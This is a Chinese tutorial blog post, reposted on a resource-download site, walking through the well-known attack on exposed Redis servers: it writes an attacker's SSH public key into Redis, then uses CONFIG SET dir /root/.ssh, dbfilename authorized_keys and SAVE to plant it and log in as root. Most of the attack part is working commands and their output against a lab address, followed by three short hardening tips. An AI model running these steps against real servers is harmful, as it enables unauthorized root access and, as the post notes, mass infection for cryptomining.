一起来聊一聊Redis挖矿原理(实例详解)

2022-03-01 0 905

本篇文章给大家打来了关于Redis挖矿原理的相关知识,下面就来演示一下如何通过Redis进行提权获取远程服务器的Root用户,并且如何防护,希望对大家有帮助。

一起来聊一聊Redis挖矿原理(实例详解)

推荐学习:Redis视频教程

今天我们就演示一下如果通过Redis进行提权获取远程服务器的Root用户。

1、首先我们需要一些先决条件

条件一:你首先要有一个Redis,并且我们要知道他的端口【默认6379】;

条件二:Redis的密码不能过于复杂,或者没有密码;

条件三:启动Redis的用户最好是Root用户,这样破坏性更大;

2、开始搞事情

2.1 创建一对秘钥

通过ssh-keygen生成一对,当然可以使用已经有的都没有问题。

root@kali:/usr/local/src# ssh-keygenGenerating public/private rsa key pair.Enter file in which to save the key (/root/.ssh/id_rsa): /tmp/rediskey/id_rsa

接下来通过公钥生成攻击键值

(echo -e "\\n\\n"; cat id_rsa.pub; echo -e "\\n\\n";) > foo.txt

内容如下

root@kali:/tmp/rediskey# cat foo.txtssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kali

这里前后增加两个换行符是为了防止数据连接在一起造成失效问题。

2.2 配置Key到Redis中

操作如下:

root@kali:/tmp/rediskey# cat foo.txt |redis-cli -h 192.168.243.129 -x set barOK

登录Redis进行检查,是否已经写入进Redis中。

root@kali:/tmp/rediskey# redis-cli -h 192.168.243.129192.168.243.129:6379> get bar"\\n\\n\\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kali\\n\\n\\n\\n"

2.3 通过Redis保存机制替换系统文件

且看如下操作

192.168.243.129:6379> config set dir /root/.sshOK192.168.243.129:6379> config get dir1) "dir"2) "/root/.ssh"192.168.243.129:6379> config set dbfilename "authorized_keys"OK192.168.243.129:6379> saveOK192.168.243.129:6379> exit

这个时候,我们登录远程主机看下效果。

root@kali:/tmp/rediskey# ssh -i id_rsa root@192.168.243.129The authenticity of host '192.168.243.129 (192.168.243.129)' can't be established.ECDSA key fingerprint is SHA256:XTnAL+b8HB5FL/t3ZlZqt0EfmTBgj7TI5VBU0nSHSGU.Are you sure you want to continue connecting (yes/no)? yesWarning: Permanently added '192.168.243.129' (ECDSA) to the list of known hosts.Linux kali 4.19.0-kali3-amd64 #1 SMP Debian 4.19.20-1kali1 (2019-02-14) x86_64Last login: Sun Apr 14 20:52:40 2019 from 192.168.243.1root@kali:~#

OK,到这里我们已经提权成功了,那我们看下导出文件到底是什么呢?其实就是Redis的保存文件形式罢了,有兴趣可以自己打开看看,这里不再展示。

3、如何预防

这个漏洞威力还是挺大的,我们现在只是拿到主机权限一个而已,加入放到定时任务执行一些脚本然后在批量感染呢?

防范的技巧如下:

Redis不要监听在危险IP上,如果有请加防火墙控制

Redis一定要增加密码限制,且不能是弱口令;

Redis尽量不要用Root用户身份来启动。

做到如上三点防范Redis挖矿,没问题的

推荐学习:Redis视频教程

收藏 (0) 打赏

感谢您的支持,我会继续努力的!

打开微信/支付宝扫一扫,即可进行扫码打赏哦,分享从这里开始,精彩与您同在
点赞 (0)

【声明:根据2013年1月30日《计算机软件保护条例》2次修订第17条规定: 为了学习和研究软件内含的设计思想和原理,通过安装、显示、传输或者存 储软件等方式使用软件的,可以不经软件著作权人许可,不向其支付报酬! 鉴于此,也希望大家按此说明研究软件!】
本站所有源码尽量保证原汁原味,如有特殊情况会作出声明及标注,网站资源不做任何二次加密(原版加密除外,不影响程序使用的不会做解密处理),方便您更好的学习参考。 在您的能力范围内,为了大环境的良性发展,请尽可能的选择正版资源。如若本站内容侵犯了原著者的合法权益,可联系我们进行处理。

即刻码站__国内靠谱的站长资源下载平台 php教程 一起来聊一聊Redis挖矿原理(实例详解) https://www.jike1995.com/31684.html

常见问题
  • 本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用
查看详情
  • 最常见的情况是下载不完整: 可对比下载完压缩包的与网盘上的容量,若小于网盘提示的容量则是这个原因。这是浏览器下载的bug,建议用百度
查看详情

相关文章

发表评论
暂无评论
官方客服团队

为您解决烦忧 - 24小时在线 专业服务